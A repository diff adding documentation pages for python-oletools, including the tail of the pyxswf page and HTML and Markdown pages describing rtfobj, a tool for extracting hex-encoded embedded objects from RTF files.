  65 + [SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_0
  66 + 00036DD
  67 + [ADDR] SWF 1 at 0xc40 - FWS Header
  68 + [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
  69 +
  70 +
  71 +
  72 +## How to use pyxswf in Python applications
  73 +
  74 +TODO
  75 +
  76 +--------------------------------------------------------------------------
  77 +
  78 +python-oletools documentation
  79 +-----------------------------
  80 +
  81 +- [[Home]]
  82 +- [[License]]
  83 +- [[Install]]
  84 +- [[Contribute]], Suggest Improvements or Report Issues
  85 +- Tools:
  86 + - [[olebrowse]]
  87 + - [[oleid]]
  88 + - [[olemeta]]
  89 + - [[oletimes]]
  90 + - [[olevba]]
  91 + - [[pyxswf]]
  92 + - [[rtfobj]]
0 93 \ No newline at end of file
... ...
oletools/doc/rtfobj.html 0 → 100644
  View file @1d0ddff
  1 +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2 +<html xmlns="http://www.w3.org/1999/xhtml">
  3 +<head>
  4 + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5 + <meta http-equiv="Content-Style-Type" content="text/css" />
  6 + <meta name="generator" content="pandoc" />
  7 + <title></title>
  8 +</head>
  9 +<body>
  10 +<h1 id="rtfobj">rtfobj</h1>
  11 +<p>rtfobj is a Python module to extract embedded objects from RTF files, such as OLE ojects. It can be used as a Python library or a command-line tool.</p>
  12 +<p>It is part of the <a href="http://www.decalage.info/python/oletools">python-oletools</a> package.</p>
  13 +<h2 id="usage">Usage</h2>
  14 +<pre><code>rtfobj.py &lt;file.rtf&gt;</code></pre>
  15 +<p>It extracts and decodes all the data blocks encoded as hexadecimal in the RTF document, and saves them as files named &quot;object_xxxx.bin&quot;, xxxx being the location of the object in the RTF file.</p>
  16 +<h2 id="how-to-use-rtfobj-in-python-applications">How to use rtfobj in Python applications</h2>
  17 +<p>Usage as a python module:</p>
  18 +<p>rtf_iter_objects(filename) is an iterator which yields a tuple (index, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.</p>
  19 +<p>Example:</p>
  20 +<pre><code>import rtfobj
  21 +for index, data in rtfobj.rtf_iter_objects(&quot;myfile.rtf&quot;):
  22 + print &#39;found object size %d at index %08X&#39; % (len(data), index)</code></pre>
  23 +<hr />
  24 +<h2 id="python-oletools-documentation">python-oletools documentation</h2>
  25 +<ul>
  26 +<li><a href="Home.html">Home</a></li>
  27 +<li><a href="License.html">License</a></li>
  28 +<li><a href="Install.html">Install</a></li>
  29 +<li><a href="Contribute.html">Contribute</a>, Suggest Improvements or Report Issues</li>
  30 +<li>Tools:
  31 +<ul>
  32 +<li><a href="olebrowse.html">olebrowse</a></li>
  33 +<li><a href="oleid.html">oleid</a></li>
  34 +<li><a href="olemeta.html">olemeta</a></li>
  35 +<li><a href="oletimes.html">oletimes</a></li>
  36 +<li><a href="olevba.html">olevba</a></li>
  37 +<li><a href="pyxswf.html">pyxswf</a></li>
  38 +<li><a href="rtfobj.html">rtfobj</a></li>
  39 +</ul></li>
  40 +</ul>
  41 +</body>
  42 +</html>
... ...
oletools/doc/rtfobj.md 0 → 100644
  View file @1d0ddff
  1 +rtfobj
  2 +======
  3 +
  4 +rtfobj is a Python module to extract embedded objects from RTF files, such as
  5 +OLE ojects. It can be used as a Python library or a command-line tool.
  6 +
  7 +It is part of the [python-oletools](http://www.decalage.info/python/oletools) package.
  8 +
  9 +## Usage
  10 +
  11 + :::text
  12 + rtfobj.py <file.rtf>
  13 +
  14 +It extracts and decodes all the data blocks encoded as hexadecimal in the RTF document, and saves them as files named "object_xxxx.bin", xxxx being the location of the object in the RTF file.
  15 +
  16 +
  17 +
  18 +## How to use rtfobj in Python applications
  19 +
  20 +Usage as a python module:
  21 +
  22 +rtf_iter_objects(filename) is an iterator which yields a tuple (index, object) providing the index of each hexadecimal stream in the RTF file, and the corresponding decoded object.
  23 +
  24 +Example:
  25 +
  26 + :::python
  27 + import rtfobj
  28 + for index, data in rtfobj.rtf_iter_objects("myfile.rtf"):
  29 + print 'found object size %d at index %08X' % (len(data), index)
  30 +
  31 +--------------------------------------------------------------------------
  32 +
  33 +python-oletools documentation
  34 +-----------------------------
  35 +
  36 +- [[Home]]
  37 +- [[License]]
  38 +- [[Install]]
  39 +- [[Contribute]], Suggest Improvements or Report Issues
  40 +- Tools:
  41 + - [[olebrowse]]
  42 + - [[oleid]]
  43 + - [[olemeta]]
  44 + - [[oletimes]]
  45 + - [[olevba]]
  46 + - [[pyxswf]]
  47 + - [[rtfobj]]
0 48 \ No newline at end of file
... ...